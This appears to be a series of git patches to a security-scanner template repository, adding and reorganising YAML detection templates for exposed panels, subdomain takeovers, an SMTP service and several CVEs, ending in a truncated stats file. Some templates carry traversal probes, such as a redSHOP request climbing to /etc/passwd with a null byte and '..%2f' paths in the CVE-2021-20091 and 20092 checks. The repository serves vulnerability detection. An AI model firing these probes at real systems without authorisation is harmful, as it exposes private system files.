+20,4 @@ requests: - type: regex regex: - ".*?(f|F)(i|I)(r|R)(e|E)(b|B)(a|A)(s|S)(e|E)(i|I)(o|O)[.](c|C)(o|O)(m|M).*?" - part: body \ No newline at end of file + part: body From 963f0a7d310a5925cf28b775f7be537edefd853c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:23:22 +0530 Subject: [PATCH 2219/4083] Rename technologies/aws-bucket-service.yaml to technologies/aws/aws-bucket-service.yaml --- technologies/{ => aws}/aws-bucket-service.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename technologies/{ => aws}/aws-bucket-service.yaml (96%) diff --git a/technologies/aws-bucket-service.yaml b/technologies/aws/aws-bucket-service.yaml similarity index 96% rename from technologies/aws-bucket-service.yaml rename to technologies/aws/aws-bucket-service.yaml index b3eacd8135..ad824b8670 100644 --- a/technologies/aws-bucket-service.yaml +++ b/technologies/aws/aws-bucket-service.yaml @@ -26,4 +26,4 @@ requests: dsl: - contains(tolower(all_headers), 'x-guploader-uploadid') part: header - negative: true \ No newline at end of file + negative: true From d0dbf4eaf08cf876e3d89aea683b98a43c4dd211 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:23:56 +0530 Subject: [PATCH 2220/4083] Rename technologies/telerik-dialoghandler-detect.yaml to technologies/telerik/telerik-dialoghandler-detect.yaml --- technologies/{ => telerik}/telerik-dialoghandler-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => telerik}/telerik-dialoghandler-detect.yaml (100%) diff --git a/technologies/telerik-dialoghandler-detect.yaml b/technologies/telerik/telerik-dialoghandler-detect.yaml similarity index 100% rename from technologies/telerik-dialoghandler-detect.yaml rename to technologies/telerik/telerik-dialoghandler-detect.yaml From ee5b86d40e3cd130e6869e404304e941b7e5b650 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sun, 12 Sep 2021 23:24:03 +0530 Subject: [PATCH 2221/4083] Rename technologies/telerik-fileupload-detect.yaml to technologies/telerik/telerik-fileupload-detect.yaml --- technologies/{ => telerik}/telerik-fileupload-detect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{ => telerik}/telerik-fileupload-detect.yaml (100%) diff --git a/technologies/telerik-fileupload-detect.yaml b/technologies/telerik/telerik-fileupload-detect.yaml similarity index 100% rename from technologies/telerik-fileupload-detect.yaml rename to technologies/telerik/telerik-fileupload-detect.yaml From 6814a334ea3e5c61268a68946fffb7e8edeae3e9 Mon Sep 17 00:00:00 2001 From: johnk3r Date: Sun, 12 Sep 2021 16:31:54 -0300 Subject: [PATCH 2222/4083] Create totemomail-detect.yaml --- exposed-panels/totemomail-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/totemomail-detect.yaml diff --git a/exposed-panels/totemomail-detect.yaml b/exposed-panels/totemomail-detect.yaml new file mode 100644 index 0000000000..0a133f9cb2 --- /dev/null +++ b/exposed-panels/totemomail-detect.yaml @@ -0,0 +1,21 @@ +id: totemomail-detect + +info: + name: Detect totemomail - Secure email communication + author: johnk3r + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/responsiveUI/webmail/folder.xhtml" + + matchers-condition: and + matchers: + - type: word + words: + - "totemomail" + part: body + - type: status + status: + - 200 From 05d086181c0225598e631482d27d5786dfce3971 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 13 Sep 2021 07:35:04 +0700 Subject: [PATCH 2223/4083] Create CVE-2010-1531.yaml --- cves/2010/CVE-2010-1531.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1531.yaml diff --git a/cves/2010/CVE-2010-1531.yaml b/cves/2010/CVE-2010-1531.yaml new file mode 100644 index 0000000000..c118f123cd --- /dev/null +++ b/cves/2010/CVE-2010-1531.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1531 + +info: + name: Joomla! Component redSHOP 1.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12054 + - https://www.cvedetails.com/cve/CVE-2010-1531 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 12e57d2e695a8aa063236d5e483d648f981ed4d4 Mon Sep 17 00:00:00 2001 From: itamarw Date: Mon, 13 Sep 2021 12:03:47 +0300 Subject: [PATCH 2224/4083] Added pagewiz-takeover.yaml --- takeovers/pagewiz-takeover.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 takeovers/pagewiz-takeover.yaml diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml new file mode 100644 index 0000000000..52535df3c7 --- /dev/null +++ b/takeovers/pagewiz-takeover.yaml @@ -0,0 +1,19 @@ +id: pagewiz-takeover + +info: + name: Pagewiz subdomain takeover + author: brabbit10 + severity: high + tags: takeover + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + words: + - '404 - Page Not Found' + - 'Start Your New Landing Page Now!' + condition: and \ No newline at end of file From 876e6302f55eeeadf161c32c37af7b2ba8abdcae Mon Sep 17 00:00:00 2001 From: itamarw Date: Mon, 13 Sep 2021 12:18:55 +0300 Subject: [PATCH 2225/4083] Updated pagewiz-takeover.yaml --- takeovers/pagewiz-takeover.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml index 52535df3c7..2922146bd1 100644 --- a/takeovers/pagewiz-takeover.yaml +++ b/takeovers/pagewiz-takeover.yaml @@ -16,4 +16,6 @@ requests: words: - '404 - Page Not Found' - 'Start Your New Landing Page Now!' - condition: and \ No newline at end of file + - 'pagewiz' + condition: and + \ No newline at end of file From d48ac960a7c1c4bd8865e4604ba0f300f8fd937c Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:08:30 +0530 Subject: [PATCH 2226/4083] Rename exposed-panels/ibm-note-login.yaml to exposed-panels/ibm/ibm-note-login.yaml --- exposed-panels/{ => ibm}/ibm-note-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{ => ibm}/ibm-note-login.yaml (100%) diff --git a/exposed-panels/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml similarity index 100% rename from exposed-panels/ibm-note-login.yaml rename to exposed-panels/ibm/ibm-note-login.yaml From 8b117065d5e6bbc2d33b08a0968dc94a31a5fa27 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:08:48 +0530 Subject: [PATCH 2227/4083] Update ibm-note-login.yaml --- exposed-panels/ibm/ibm-note-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/ibm/ibm-note-login.yaml b/exposed-panels/ibm/ibm-note-login.yaml index a178a6d3b7..8aeaae29fa 100644 --- a/exposed-panels/ibm/ibm-note-login.yaml +++ b/exposed-panels/ibm/ibm-note-login.yaml @@ -5,7 +5,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/7122 - tags: panel + tags: panel,ibm requests: - method: GET From 96b22ca82ae7ba87f5cf5c33b27dd5cd934a308a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:09:16 +0530 Subject: [PATCH 2228/4083] Update and rename exposed-panels/ibm-security-access-manager.yaml to exposed-panels/ibm/ibm-security-access-manager.yaml --- .../{ => ibm}/ibm-security-access-manager.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) rename exposed-panels/{ => ibm}/ibm-security-access-manager.yaml (83%) diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml similarity index 83% rename from exposed-panels/ibm-security-access-manager.yaml rename to exposed-panels/ibm/ibm-security-access-manager.yaml index 3d2e8aa816..77c728b173 100644 --- a/exposed-panels/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -2,10 +2,11 @@ id: ibm-security-access-manager info: name: Detects IBM Security Access Manager - description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. - reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager author: geeknik severity: info + description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. + reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager + tags: panel,ibm requests: - method: GET @@ -16,11 +17,8 @@ requests: matchers: - type: word words: - - "IBM Security Access Manager" - - "<h2>IBM Security" - - "<em>Access Manager" + - "<title>IBM Security Access Manager" part: body - condition: and - type: word part: header From dcc3ef533035cba20023c7d0ac45195c33c6b9f3 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:10:25 +0530 Subject: [PATCH 2229/4083] Update ibm-security-access-manager.yaml --- exposed-panels/ibm/ibm-security-access-manager.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/ibm/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml index 77c728b173..4d40dab456 100644 --- a/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -21,6 +21,6 @@ requests: part: body - type: word - part: header words: - "IBM Security Access Manager for Web" + part: header From 7a3dbb27e29781d85a8698855aac2f7ff9e37ae7 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:26:26 +0530 Subject: [PATCH 2230/4083] Create totemomail-smtp-detect.yaml --- network/totemomail-smtp-detect.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 network/totemomail-smtp-detect.yaml diff --git a/network/totemomail-smtp-detect.yaml b/network/totemomail-smtp-detect.yaml new file mode 100644 index 0000000000..7eecf58266 --- /dev/null +++ b/network/totemomail-smtp-detect.yaml @@ -0,0 +1,21 @@ +id: totemomail-smtp-detect + +info: + name: Totemomail SMTP Server Detect + author: princechaddha + severity: info + tags: mail,smtp,network,totemomail + +network: + - inputs: + - data: "\r\n" + read-size: 2048 + + host: + - "{{Hostname}}" + - "{{Hostname}}:25" + + matchers: + - type: word + words: + - "totemomail" From 546bd6a03870668de2c561545565e1e06a356417 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 13 Sep 2021 15:28:35 +0530 Subject: [PATCH 2231/4083] matcher update --- vulnerabilities/other/bullwark-momentum-lfi.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index 96e46cec40..e6f95ebac9 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -29,6 +29,6 @@ requests: status: - 200 - - type: word - words: - - "root:" + - type: regex + regex: + - "root:.*:0:0" \ No newline at end of file From 19f73e7c2bac4ba014b7affd2e5b1c5d8fd79f71 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:31:03 +0530 Subject: [PATCH 2232/4083] Update totemomail-detect.yaml --- exposed-panels/totemomail-detect.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/exposed-panels/totemomail-detect.yaml b/exposed-panels/totemomail-detect.yaml index 0a133f9cb2..dd29136211 100644 --- a/exposed-panels/totemomail-detect.yaml +++ b/exposed-panels/totemomail-detect.yaml @@ -4,6 +4,7 @@ info: name: Detect totemomail - Secure email communication author: johnk3r severity: info + tags: totemomail,panel requests: - method: GET @@ -14,8 +15,9 @@ requests: matchers: - type: word words: - - "totemomail" + - "WebMail login: totemomail® WebMail" part: body + - type: status status: - 200 From e18cc1421825172f8fded246be2c39bbdf65549f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:34:18 +0530 Subject: [PATCH 2233/4083] Update bullwark-momentum-lfi.yaml --- vulnerabilities/other/bullwark-momentum-lfi.yaml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index e6f95ebac9..be615bacc1 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -4,12 +4,11 @@ info: name: Bullwark Momentum Series JAWS 1.0 - Directory Traversal author: pikpikcu severity: high - tags: bullwark,lfi reference: - https://www.exploit-db.com/exploits/47773 - http://www.bullwark.net/ # vendor homepage - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link - + tags: bullwark,lfi additional-fields: version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1 @@ -31,4 +30,4 @@ requests: - type: regex regex: - - "root:.*:0:0" \ No newline at end of file + - "root:.*:0:0" From 18879698fa2755739945369b88750d7db9c87831 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 13 Sep 2021 15:55:14 +0530 Subject: [PATCH 2234/4083] Update bullwark-momentum-lfi.yaml --- vulnerabilities/other/bullwark-momentum-lfi.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index be615bacc1..a6424a4b88 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -8,11 +8,11 @@ info: - https://www.exploit-db.com/exploits/47773 - http://www.bullwark.net/ # vendor homepage - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link - tags: bullwark,lfi additional-fields: version: Bullwark Momentum Series Web Server JAWS/1.0 shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1 fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D + tags: bullwark,lfi requests: - raw: From 12b42bd029ff05ebad24ab64e01cb0438473ebec Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 13 Sep 2021 23:33:03 +0530 Subject: [PATCH 2235/4083] misc update --- .../{weblogic-default-login.yaml => weblogic-weak-login.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename default-logins/weblogic/{weblogic-default-login.yaml => weblogic-weak-login.yaml} (91%) diff --git a/default-logins/weblogic/weblogic-default-login.yaml b/default-logins/weblogic/weblogic-weak-login.yaml similarity index 91% rename from default-logins/weblogic/weblogic-default-login.yaml rename to default-logins/weblogic/weblogic-weak-login.yaml index 310ae8dbb3..e49f60202c 100644 --- a/default-logins/weblogic/weblogic-default-login.yaml +++ b/default-logins/weblogic/weblogic-weak-login.yaml @@ -1,7 +1,7 @@ -id: weblogic-default-login +id: weblogic-weak-login info: - name: WebLogic default login + name: WebLogic weak login author: pdteam severity: high tags: default-login,weblogic From 7e69bb8d9fdc14198fa40df4c06dc7cca485fd1a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 00:11:45 +0530 Subject: [PATCH 2236/4083] Update ibm-security-access-manager.yaml --- exposed-panels/ibm/ibm-security-access-manager.yaml | 7 +++++++ 1 file changed, 7 insertions(+) diff --git a/exposed-panels/ibm/ibm-security-access-manager.yaml b/exposed-panels/ibm/ibm-security-access-manager.yaml index 4d40dab456..ee25284a26 100644 --- a/exposed-panels/ibm/ibm-security-access-manager.yaml +++ b/exposed-panels/ibm/ibm-security-access-manager.yaml @@ -24,3 +24,10 @@ requests: words: - "IBM Security Access Manager for Web" part: header + + - type: word + words: + - "/mga/sps/authsvc/policy/forgot_username" + - "/mga/sps/authsvc/policy/forgot_password" + part: body + condition: and From 7df1db7aefe175ef2b3cf0f635895fac931d41ce Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 14 Sep 2021 00:40:15 +0530 Subject: [PATCH 2237/4083] Update pagewiz-takeover.yaml --- takeovers/pagewiz-takeover.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/takeovers/pagewiz-takeover.yaml b/takeovers/pagewiz-takeover.yaml index 2922146bd1..7984ec3011 100644 --- a/takeovers/pagewiz-takeover.yaml +++ b/takeovers/pagewiz-takeover.yaml @@ -18,4 +18,3 @@ requests: - 'Start Your New Landing Page Now!' - 'pagewiz' condition: and - \ No newline at end of file From acbb038e016d0b9feef502299c074950d27e4c0c Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 01:22:44 +0530 Subject: [PATCH 2238/4083] misc update --- cves/2021/CVE-2021-20091.yaml | 2 +- cves/2021/CVE-2021-20092.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-20091.yaml b/cves/2021/CVE-2021-20091.yaml index 650be7cd88..95bdbe5501 100644 --- a/cves/2021/CVE-2021-20091.yaml +++ b/cves/2021/CVE-2021-20091.yaml @@ -21,7 +21,7 @@ requests: - | GET /images/..%2finfo.html HTTP/1.1 Host: {{Hostname}} - Referer: {{{{BaseURL}}}}/info.html + Referer: {{BaseURL}}/info.html - | POST /images/..%2fapply_abstract.cgi HTTP/1.1 diff --git a/cves/2021/CVE-2021-20092.yaml b/cves/2021/CVE-2021-20092.yaml index 72246e7705..a84b883624 100644 --- a/cves/2021/CVE-2021-20092.yaml +++ b/cves/2021/CVE-2021-20092.yaml @@ -22,7 +22,7 @@ requests: - | GET /images/..%2finfo.html HTTP/1.1 Host: {{Hostname}} - Referer: {{{{BaseURL}}}}/info.html + Referer: {{BaseURL}}/info.html - | GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode("R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"))}} HTTP/1.1 From 8c92195fef525c588d8ebcc8e1c79fa862d92047 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 14 Sep 2021 01:54:21 +0530 Subject: [PATCH 2239/4083] misc update --- ...l-native-cred-bruteforce.yaml => mysql-native-password.yaml} | 2 +- ...ative-password-bruteforce.yaml => tidb-native-password.yaml} | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) rename network/{mysql-native-cred-bruteforce.yaml => mysql-native-password.yaml} (91%) rename network/{tidb-native-password-bruteforce.yaml => tidb-native-password.yaml} (93%) diff --git a/network/mysql-native-cred-bruteforce.yaml b/network/mysql-native-password.yaml similarity index 91% rename from network/mysql-native-cred-bruteforce.yaml rename to network/mysql-native-password.yaml index 213c71805a..3303abcd3b 100644 --- a/network/mysql-native-cred-bruteforce.yaml +++ b/network/mysql-native-password.yaml @@ -1,4 +1,4 @@ -id: mysql-native-password-bruteforce +id: mysql-native-password info: name: MySQL DB with enabled native password diff --git a/network/tidb-native-password-bruteforce.yaml b/network/tidb-native-password.yaml similarity index 93% rename from network/tidb-native-password-bruteforce.yaml rename to network/tidb-native-password.yaml index a72290581b..91aa175cb7 100644 --- a/network/tidb-native-password-bruteforce.yaml +++ b/network/tidb-native-password.yaml @@ -1,4 +1,4 @@ -id: tidb-native-password-bruteforce +id: tidb-native-password info: name: TiDB DB with enabled native password From 41d001ebb6051c79bc846dc7369e3132d1593370 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 13 Sep 2021 20:33:42 +0000 Subject: [PATCH 2240/4083] Auto Generated Templates Stats [Mon Sep 13 20:33:42 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1549 ++++++++++++++++++++++-------------------- TOP-10.md | 20 +- 3 files changed, 810 insertions(+), 761 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 01a0ac282d..e295b164f1 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":666},{"name":"panel","count":236},{"name":"lfi","count":228},{"name":"xss","count":225},{"name":"exposure","count":221},{"name":"wordpress","count":206},{"name":"rce","count":193},{"name":"cve2020","count":159},{"name":"wp-plugin","count":139},{"name":"cve2021","count":112},{"name":"tech","count":111},{"name":"config","count":93},{"name":"cve2019","count":90},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":60},{"name":"joomla","count":59},{"name":"iot","count":58},{"name":"cve2010","count":51},{"name":"cve2017","count":49},{"name":"oob","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"network","count":39},{"name":"sqli","count":38},{"name":"ssrf","count":35},{"name":"cve2016","count":32},{"name":"oracle","count":31},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"redirect","count":28},{"name":"atlassian","count":27},{"name":"listing","count":25},{"name":"misc","count":23},{"name":"cve2015","count":20},{"name":"disclosure","count":20},{"name":"router","count":19},{"name":"aem","count":19},{"name":"generic","count":19},{"name":"cisco","count":19},{"name":"sap","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":15},{"name":"cve2012","count":14},{"name":"misconfig","count":14},{"name":"struts","count":13},{"name":"android","count":13},{"name":"cve2011","count":13},{"name":"adobe","count":13},{"name":"fuzz","count":13},{"name":"php","count":13},{"name":"devops","count":12},{"name":"weblogic","count":12},{"name":"jenkins","count":12},{"name":"dns","count":12},{"name":"dlink","count":12},{"name":"zoho","count":11},{"name":"cve2013","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"xxe","count":9},{"name":"magento","count":9},{"name":"cnvd","count":8},{"name":"login","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"backup","count":7},{"name":"cve2009","count":7},{"name":"kubernetes","count":7},{"name":"nginx","count":7},{"name":"netgear","count":7},{"name":"files","count":7},{"name":"vmware","count":7},{"name":"google","count":6},{"name":"cve2008","count":6},{"name":"jetty","count":6},{"name":"citrix","count":6},{"name":"dell","count":6},{"name":"confluence","count":6},{"name":"laravel","count":6},{"name":"solr","count":6},{"name":"docker","count":6},{"name":"rconfig","count":6},{"name":"django","count":6},{"name":"api","count":6},{"name":"java","count":5},{"name":"ibm","count":5},{"name":"drupal","count":5},{"name":"lucee","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"headless","count":5},{"name":"dedecms","count":5},{"name":"fileupload","count":5},{"name":"wp-theme","count":5},{"name":"nodejs","count":5},{"name":"microsoft","count":5},{"name":"phpmyadmin","count":5},{"name":"printer","count":5},{"name":"circarlife","count":5},{"name":"iis","count":5},{"name":"tomcat","count":4},{"name":"thinkphp","count":4},{"name":"exchange","count":4},{"name":"asp","count":4},{"name":"hp","count":4},{"name":"glpi","count":4},{"name":"thinkcmf","count":4},{"name":"magmi","count":4},{"name":"jolokia","count":4},{"name":"firmware","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"vpn","count":4},{"name":"zimbra","count":4},{"name":"solarwinds","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"wso2","count":4},{"name":"buffalo","count":4},{"name":"moodle","count":4},{"name":"grafana","count":4},{"name":"samsung","count":4},{"name":"traversal","count":4},{"name":"deserialization","count":4},{"name":"crlf","count":4},{"name":"hongdian","count":4},{"name":"targa","count":3},{"name":"bitrix","count":3},{"name":"oa","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"slack","count":3},{"name":"amazon","count":3},{"name":"tikiwiki","count":3},{"name":"backups","count":3},{"name":"openssh","count":3},{"name":"nacos","count":3},{"name":"zabbix","count":3},{"name":"springcloud","count":3},{"name":"httpd","count":3},{"name":"kevinlab","count":3},{"name":"vbulletin","count":3},{"name":"ssh","count":3},{"name":"caucho","count":3},{"name":"nexus","count":3},{"name":"zhiyuan","count":3},{"name":"r-seenet","count":3},{"name":"mongodb","count":3},{"name":"git","count":3},{"name":"itop","count":3},{"name":"intrusive","count":3},{"name":"opensis","count":3},{"name":"resin","count":3},{"name":"kafka","count":3},{"name":"nosqli","count":3},{"name":"lfr","count":3},{"name":"ebs","count":3},{"name":"fanruan","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"ofbiz","count":3},{"name":"bypass","count":3},{"name":"cve2007","count":2},{"name":"sharepoint","count":2},{"name":"showdoc","count":2},{"name":"hjtcloud","count":2},{"name":"horde","count":2},{"name":"yapi","count":2},{"name":"prestashop","count":2},{"name":"github","count":2},{"name":"natshell","count":2},{"name":"linkerd","count":2},{"name":"chamilo","count":2},{"name":"dos","count":2},{"name":"npm","count":2},{"name":"emerge","count":2},{"name":"rstudio","count":2},{"name":"phpcollab","count":2},{"name":"strapi","count":2},{"name":"akamai","count":2},{"name":"spark","count":2},{"name":"shellshock","count":2},{"name":"smtp","count":2},{"name":"ucmdb","count":2},{"name":"splunk","count":2},{"name":"grav","count":2},{"name":"oauth","count":2},{"name":"rockethchat","count":2},{"name":"injection","count":2},{"name":"leak","count":2},{"name":"jellyfin","count":2},{"name":"saltstack","count":2},{"name":"sonicwall","count":2},{"name":"fortios","count":2},{"name":"igs","count":2},{"name":"prometheus","count":2},{"name":"trixbox","count":2},{"name":"glassfish","count":2},{"name":"node","count":2},{"name":"keycloak","count":2},{"name":"huawei","count":2},{"name":"hashicorp","count":2},{"name":"ec2","count":2},{"name":"jeedom","count":2},{"name":"paloalto","count":2},{"name":"openfire","count":2},{"name":"icewarp","count":2},{"name":"azure","count":2},{"name":"telerik","count":2},{"name":"mida","count":2},{"name":"middleware","count":2},{"name":"proxy","count":2},{"name":"hasura","count":2},{"name":"service","count":2},{"name":"plesk","count":2},{"name":"voipmonitor","count":2},{"name":"odoo","count":2},{"name":"couchdb","count":2},{"name":"waf","count":2},{"name":"flir","count":2},{"name":"mail","count":2},{"name":"jsf","count":2},{"name":"status","count":2},{"name":"chiyu","count":2},{"name":"xxljob","count":2},{"name":"wordfence","count":2},{"name":"sonarqube","count":2},{"name":"kentico","count":2},{"name":"netis","count":2},{"name":"hoteldruid","count":2},{"name":"maian","count":2},{"name":"seeyon","count":2},{"name":"cve2005","count":2},{"name":"activemq","count":2},{"name":"bigip","count":2},{"name":"axis2","count":2},{"name":"geowebserver","count":2},{"name":"frp","count":2},{"name":"avantfax","count":2},{"name":"pega","count":2},{"name":"backdoor","count":2},{"name":"jboss","count":2},{"name":"nagios","count":2},{"name":"vrealize","count":2},{"name":"nextjs","count":2},{"name":"ecology","count":2},{"name":"webcam","count":2},{"name":"dolibarr","count":2},{"name":"smb","count":2},{"name":"kibana","count":2},{"name":"openam","count":2},{"name":"axis","count":2},{"name":"firebase","count":2},{"name":"idrac","count":2},{"name":"mcafee","count":2},{"name":"rockmongo","count":2},{"name":"globalprotect","count":2},{"name":"hpe","count":2},{"name":"cache","count":2},{"name":"guacamole","count":2},{"name":"akkadian","count":2},{"name":"pcoip","count":1},{"name":"webmodule-ee","count":1},{"name":"expn","count":1},{"name":"pagespeed","count":1},{"name":"alibaba","count":1},{"name":"centos","count":1},{"name":"bigbluebutton","count":1},{"name":"kubeflow","count":1},{"name":"landray","count":1},{"name":"clave","count":1},{"name":"kafdrop","count":1},{"name":"saltapi","count":1},{"name":"zarafa","count":1},{"name":"cve2006","count":1},{"name":"jfrog","count":1},{"name":"trilithic","count":1},{"name":"achecker","count":1},{"name":"tieline","count":1},{"name":"geddy","count":1},{"name":"graphite","count":1},{"name":"mantis","count":1},{"name":"springframework","count":1},{"name":"smartblog","count":1},{"name":"jnoj","count":1},{"name":"yachtcontrol","count":1},{"name":"clickhouse","count":1},{"name":"xunchi","count":1},{"name":"smartsense","count":1},{"name":"blue-ocean","count":1},{"name":"stem","count":1},{"name":"mirai","count":1},{"name":"sgp","count":1},{"name":"pgadmin","count":1},{"name":"hiawatha","count":1},{"name":"default","count":1},{"name":"gespage","count":1},{"name":"bedita","count":1},{"name":"vnc","count":1},{"name":"harbor","count":1},{"name":"webadmin","count":1},{"name":"haproxy","count":1},{"name":"opensmtpd","count":1},{"name":"upload","count":1},{"name":"wifisky","count":1},{"name":"nps","count":1},{"name":"tapestry","count":1},{"name":"socomec","count":1},{"name":"adb","count":1},{"name":"rsyncd","count":1},{"name":"blackboard","count":1},{"name":"servicedesk","count":1},{"name":"logontracer","count":1},{"name":"chevereto","count":1},{"name":"moin","count":1},{"name":"mobileiron","count":1},{"name":"b2evolution","count":1},{"name":"jsp","count":1},{"name":"fedora","count":1},{"name":"pacsone","count":1},{"name":"nordex","count":1},{"name":"empirecms","count":1},{"name":"mpsec","count":1},{"name":"qsan","count":1},{"name":"uwsgi","count":1},{"name":"prtg","count":1},{"name":"parentlink","count":1},{"name":"jquery","count":1},{"name":"wiki","count":1},{"name":"spidercontrol","count":1},{"name":"fortiweb","count":1},{"name":"csod","count":1},{"name":"db","count":1},{"name":"duomicms","count":1},{"name":"tongda","count":1},{"name":"tracer","count":1},{"name":"ph